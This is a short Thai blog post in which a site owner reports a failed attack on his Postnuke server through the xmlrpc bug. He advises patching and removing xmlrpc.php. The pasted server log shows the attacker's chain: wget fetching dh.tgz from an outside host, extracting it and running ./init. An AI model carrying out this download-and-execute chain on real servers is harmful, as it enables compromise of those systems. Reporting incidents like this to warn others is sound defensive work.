โดนโจมตี Postnuke

by MrChoke

ได้ยินข่าวเรื่อง bug ของ xmlrpc มาหลายวันแล้วแต่ยังไม่ได้แก้ไขวันนี้เลยเจอดีเข้าจนได้โดยได้มีมือดี จากหมายเลข IP 66.149.216.250 (Foundation For the Future) ส่งข้อมูลโดย method POST เข้ามาทาง /xmlrpc.php แล้วสั่งให้ทำการ download file ด้วย wget จาก http://dorohoi.org/insert/dh.tgz แล้วสั่งแตก tar ออกมา แต่กระบวนการนี้ไม่เสร็จโชคดีไปครับ เนื่องจากภายในบังคับผ่าน proxy ใครที่ยังไม่ได้แก้ไขก็รีบแก้นะครับก่อนจะสายเกินแก้ .. ผมอ่านเจอเขาแนะนำให้เอา xmlrpm.php ออกไปเลย พร้อมทั้ง ลบ module xmlrpc ออกไปด้วย

–16:47:36– http://dorohoi.org/insert/dh.tgz
=> `dh.tgz’
Resolving dorohoi.org… 64.92.162.194
Connecting to dorohoi.org[64.92.162.194]:80… failed: Connection timed out.
Retrying.

.
.
.

–17:49:52– http://dorohoi.org/insert/dh.tgz
(try:20) => `dh.tgz’
Connecting to dorohoi.org[64.92.162.194]:80… failed: Connection timed out.
Giving up.
tar: dh.tgz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
sh: line 0: cd: .dh: No such file or directory
sh: ./init: No such file or directory